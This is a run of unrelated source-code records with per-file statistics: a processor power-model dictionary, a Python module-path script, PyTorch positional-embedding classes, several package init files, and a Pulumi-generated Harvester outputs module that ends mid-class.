'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.83937,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191757,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.258403,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.29275,
'Instruction Fetch Unit/Runtime Dynamic': 0.540848,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00651431,
'L2/Runtime Dynamic': 0.00197943,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07651,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.40546,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271564,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0271564,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20475,
'Load Store Unit/Runtime Dynamic': 0.566543,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0669631,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.133926,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0237654,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0238628,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.300894,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314367,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497828,
'Memory Management Unit/Runtime Dynamic': 0.0552995,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0504,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353067,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158073,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.122033,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490907,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95529,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.7403163735067331,
'Runtime Dynamic': 0.7403163735067331,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0457642,
'Runtime Dynamic': 0.0249573,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 86.346,
'Peak Power': 119.458,
'Runtime Dynamic': 25.1154,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 86.3002,
'Total Cores/Runtime Dynamic': 25.0904,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.0457642,
'Total L3s/Runtime Dynamic': 0.0249573,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.041575 | 124 | 0.681985 | 8,082 | 68,588 | 5.781737 | 0.067063 | 0.123609 | 0.112994 | 0.093477 | 0.94102 | 0.932995 | 0.920348 | 0.888974 | 0.864471 | 0.846152 | 0 | 0.131605 | 0.224398 | 68,588 | 914 | 125 | 75.041575 | 0.74679 | 0 | 0 | 0.648797 | 0 | 0 | 0.657613 | 0.048113 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2e364cdf4cade10f54e99581987c82b551222cea | 973 | py | Python | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 116 | 2015-01-06T02:15:21.000Z | 2021-10-12T01:30:39.000Z | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 5 | 2015-03-01T02:20:58.000Z | 2016-01-31T16:25:11.000Z | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 27 | 2015-03-20T10:55:53.000Z | 2021-12-28T13:09:07.000Z | import inspect, os
print __file__
print os.path.abspath(__file__)
print os.path.abspath(inspect.getfile(inspect.currentframe()))
print "==="
print inspect.getfile(inspect.currentframe())
print os.path.split(inspect.getfile( inspect.currentframe() ))[0]
print os.path.split(inspect.getfile( inspect.currentframe() ))[0] + "/mitmproxy"
print "==="
print os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0])
print os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0] + "/mitmproxy")
print os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]) + "/mitmproxy"
print "==="
print os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))
print os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0] + "/mitmproxy"))
print os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]) + "/mitmproxy") | 48.65 | 115 | 0.743063 | 130 | 973 | 5.5 | 0.1 | 0.159441 | 0.153846 | 0.461538 | 0.965035 | 0.804196 | 0.804196 | 0.804196 | 0.804196 | 0.797203 | 0 | 0.008782 | 0.06372 | 973 | 20 | 116 | 48.65 | 0.77607 | 0 | 0 | 0.1875 | 0 | 0 | 0.060575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.9375 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
5ce99d7ee57a1ce12438269e35bf39851b588bc6 | 134 | py | Python | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 7 | 2022-01-24T16:27:06.000Z | 2022-02-25T10:18:49.000Z | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 29 | 2022-01-20T15:45:38.000Z | 2022-03-31T09:39:25.000Z | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 7 | 2022-01-20T07:11:15.000Z | 2022-03-09T14:50:17.000Z | # (C) 2021 GoodData Corporation
from gooddata_fdw._version import __version__
from gooddata_fdw.fdw import GoodDataForeignDataWrapper
| 33.5 | 55 | 0.865672 | 16 | 134 | 6.8125 | 0.5625 | 0.220183 | 0.275229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033058 | 0.097015 | 134 | 3 | 56 | 44.666667 | 0.867769 | 0.216418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cf2c173ceb092651de75014f8f88b1891f64033f | 2,169 | py | Python | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | import torch
from torch.nn import Module, Dropout
import math
class PositionalEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
# precompute
pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
i = torch.arange(0, self.feature_len, 2).float()
h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
self.pe = torch.empty(self.seq_len, self.feature_len)
self.pe[:, 0::2] = torch.sin(h)
self.pe[:, 1::2] = torch.cos(h)
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
class SineEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
# precompute
pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
i = torch.arange(0, self.feature_len, 1).float()
h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
self.pe = torch.sin(h)
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
class CosineEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
# precompute
pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
i = torch.arange(0, self.feature_len, 1).float()
h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
self.pe = torch.cos(h)
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
| 33.369231 | 74 | 0.621024 | 299 | 2,169 | 4.287625 | 0.147157 | 0.088924 | 0.141966 | 0.053042 | 0.887676 | 0.872075 | 0.872075 | 0.872075 | 0.872075 | 0.872075 | 0 | 0.031573 | 0.240664 | 2,169 | 64 | 75 | 33.890625 | 0.746812 | 0.014753 | 0 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.06383 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf3bed49595cde00d7db516ec8fd7bf91f8d1694 | 44 | py | Python | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | 1 | 2022-02-26T08:39:31.000Z | 2022-02-26T08:39:31.000Z | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | null | null | null | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | null | null | null | from . import tools
from . import ntu_rgb_d
| 14.666667 | 23 | 0.772727 | 8 | 44 | 4 | 0.75 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 24 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cf64f5e30f64b6648789288af20cb73e80cf6352 | 45 | py | Python | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | from .cfg import make_gui_cfg
make_gui_cfg() | 15 | 29 | 0.822222 | 9 | 45 | 3.666667 | 0.555556 | 0.424242 | 0.606061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 3 | 30 | 15 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
cf790f5b3bd486434cd0171633b96928dc88d12d | 144 | py | Python | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | 2 | 2021-03-26T03:54:43.000Z | 2021-03-28T10:51:19.000Z | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | null | null | null | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | null | null | null | from fastapi_apollo_middleware.middleware import FastAPIApolloMiddleware
from fastapi_apollo_middleware._version import __author__, __version__
| 48 | 72 | 0.916667 | 15 | 144 | 7.933333 | 0.533333 | 0.184874 | 0.285714 | 0.453782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 144 | 2 | 73 | 72 | 0.881481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d890dc8c1cef93082adf7cf2aa0ce23528b8bc76 | 19,743 | py | Python | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-11-27T02:09:08.000Z | 2022-03-19T02:22:55.000Z | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'VirtualMachineCloudinit',
'VirtualMachineDisk',
'VirtualMachineNetworkInterface',
'GetVirtualMachineCloudinitResult',
'GetVirtualMachineDiskResult',
'GetVirtualMachineNetworkInterfaceResult',
]
@pulumi.output_type
class VirtualMachineCloudinit(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkData":
suggest = "network_data"
elif key == "networkDataBase64":
suggest = "network_data_base64"
elif key == "networkDataSecretName":
suggest = "network_data_secret_name"
elif key == "userData":
suggest = "user_data"
elif key == "userDataBase64":
suggest = "user_data_base64"
elif key == "userDataSecretName":
suggest = "user_data_secret_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineCloudinit. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineCloudinit.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineCloudinit.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
network_data: Optional[str] = None,
network_data_base64: Optional[str] = None,
network_data_secret_name: Optional[str] = None,
type: Optional[str] = None,
user_data: Optional[str] = None,
user_data_base64: Optional[str] = None,
user_data_secret_name: Optional[str] = None):
if network_data is not None:
pulumi.set(__self__, "network_data", network_data)
if network_data_base64 is not None:
pulumi.set(__self__, "network_data_base64", network_data_base64)
if network_data_secret_name is not None:
pulumi.set(__self__, "network_data_secret_name", network_data_secret_name)
if type is not None:
pulumi.set(__self__, "type", type)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if user_data_base64 is not None:
pulumi.set(__self__, "user_data_base64", user_data_base64)
if user_data_secret_name is not None:
pulumi.set(__self__, "user_data_secret_name", user_data_secret_name)
@property
@pulumi.getter(name="networkData")
def network_data(self) -> Optional[str]:
return pulumi.get(self, "network_data")
@property
@pulumi.getter(name="networkDataBase64")
def network_data_base64(self) -> Optional[str]:
return pulumi.get(self, "network_data_base64")
@property
@pulumi.getter(name="networkDataSecretName")
def network_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "network_data_secret_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[str]:
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="userDataBase64")
def user_data_base64(self) -> Optional[str]:
return pulumi.get(self, "user_data_base64")
@property
@pulumi.getter(name="userDataSecretName")
def user_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "user_data_secret_name")
@pulumi.output_type
class VirtualMachineDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "accessMode":
suggest = "access_mode"
elif key == "autoDelete":
suggest = "auto_delete"
elif key == "bootOrder":
suggest = "boot_order"
elif key == "containerImageName":
suggest = "container_image_name"
elif key == "existingVolumeName":
suggest = "existing_volume_name"
elif key == "hotPlug":
suggest = "hot_plug"
elif key == "storageClassName":
suggest = "storage_class_name"
elif key == "volumeMode":
suggest = "volume_mode"
elif key == "volumeName":
suggest = "volume_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
access_mode: Optional[str] = None,
auto_delete: Optional[bool] = None,
boot_order: Optional[int] = None,
bus: Optional[str] = None,
container_image_name: Optional[str] = None,
existing_volume_name: Optional[str] = None,
hot_plug: Optional[bool] = None,
image: Optional[str] = None,
size: Optional[str] = None,
storage_class_name: Optional[str] = None,
type: Optional[str] = None,
volume_mode: Optional[str] = None,
volume_name: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "name", name)
if access_mode is not None:
pulumi.set(__self__, "access_mode", access_mode)
if auto_delete is not None:
pulumi.set(__self__, "auto_delete", auto_delete)
if boot_order is not None:
pulumi.set(__self__, "boot_order", boot_order)
if bus is not None:
pulumi.set(__self__, "bus", bus)
if container_image_name is not None:
pulumi.set(__self__, "container_image_name", container_image_name)
if existing_volume_name is not None:
pulumi.set(__self__, "existing_volume_name", existing_volume_name)
if hot_plug is not None:
pulumi.set(__self__, "hot_plug", hot_plug)
if image is not None:
pulumi.set(__self__, "image", image)
if size is not None:
pulumi.set(__self__, "size", size)
if storage_class_name is not None:
pulumi.set(__self__, "storage_class_name", storage_class_name)
if type is not None:
pulumi.set(__self__, "type", type)
if volume_mode is not None:
pulumi.set(__self__, "volume_mode", volume_mode)
if volume_name is not None:
pulumi.set(__self__, "volume_name", volume_name)
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> Optional[str]:
return pulumi.get(self, "access_mode")
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> Optional[bool]:
return pulumi.get(self, "auto_delete")
@property
@pulumi.getter(name="bootOrder")
def boot_order(self) -> Optional[int]:
return pulumi.get(self, "boot_order")
@property
@pulumi.getter
def bus(self) -> Optional[str]:
return pulumi.get(self, "bus")
@property
@pulumi.getter(name="containerImageName")
def container_image_name(self) -> Optional[str]:
return pulumi.get(self, "container_image_name")
@property
@pulumi.getter(name="existingVolumeName")
def existing_volume_name(self) -> Optional[str]:
return pulumi.get(self, "existing_volume_name")
@property
@pulumi.getter(name="hotPlug")
def hot_plug(self) -> Optional[bool]:
return pulumi.get(self, "hot_plug")
@property
@pulumi.getter
def image(self) -> Optional[str]:
return pulumi.get(self, "image")
@property
@pulumi.getter
def size(self) -> Optional[str]:
return pulumi.get(self, "size")
@property
@pulumi.getter(name="storageClassName")
def storage_class_name(self) -> Optional[str]:
return pulumi.get(self, "storage_class_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="volumeMode")
def volume_mode(self) -> Optional[str]:
return pulumi.get(self, "volume_mode")
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> Optional[str]:
return pulumi.get(self, "volume_name")
@pulumi.output_type
class VirtualMachineNetworkInterface(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "interfaceName":
suggest = "interface_name"
elif key == "ipAddress":
suggest = "ip_address"
elif key == "macAddress":
suggest = "mac_address"
elif key == "networkName":
suggest = "network_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineNetworkInterface. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineNetworkInterface.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineNetworkInterface.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
interface_name: Optional[str] = None,
ip_address: Optional[str] = None,
mac_address: Optional[str] = None,
model: Optional[str] = None,
network_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "name", name)
if interface_name is not None:
pulumi.set(__self__, "interface_name", interface_name)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if model is not None:
pulumi.set(__self__, "model", model)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="interfaceName")
def interface_name(self) -> Optional[str]:
return pulumi.get(self, "interface_name")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[str]:
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[str]:
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def model(self) -> Optional[str]:
return pulumi.get(self, "model")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@pulumi.output_type
class GetVirtualMachineCloudinitResult(dict):
def __init__(__self__, *,
network_data: Optional[str] = None,
network_data_base64: Optional[str] = None,
network_data_secret_name: Optional[str] = None,
type: Optional[str] = None,
user_data: Optional[str] = None,
user_data_base64: Optional[str] = None,
user_data_secret_name: Optional[str] = None):
if network_data is not None:
pulumi.set(__self__, "network_data", network_data)
if network_data_base64 is not None:
pulumi.set(__self__, "network_data_base64", network_data_base64)
if network_data_secret_name is not None:
pulumi.set(__self__, "network_data_secret_name", network_data_secret_name)
if type is not None:
pulumi.set(__self__, "type", type)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if user_data_base64 is not None:
pulumi.set(__self__, "user_data_base64", user_data_base64)
if user_data_secret_name is not None:
pulumi.set(__self__, "user_data_secret_name", user_data_secret_name)
@property
@pulumi.getter(name="networkData")
def network_data(self) -> Optional[str]:
return pulumi.get(self, "network_data")
@property
@pulumi.getter(name="networkDataBase64")
def network_data_base64(self) -> Optional[str]:
return pulumi.get(self, "network_data_base64")
@property
@pulumi.getter(name="networkDataSecretName")
def network_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "network_data_secret_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[str]:
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="userDataBase64")
def user_data_base64(self) -> Optional[str]:
return pulumi.get(self, "user_data_base64")
@property
@pulumi.getter(name="userDataSecretName")
def user_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "user_data_secret_name")
@pulumi.output_type
class GetVirtualMachineDiskResult(dict):
def __init__(__self__, *,
access_mode: str,
auto_delete: bool,
bus: str,
hot_plug: bool,
name: str,
storage_class_name: str,
volume_mode: str,
volume_name: str,
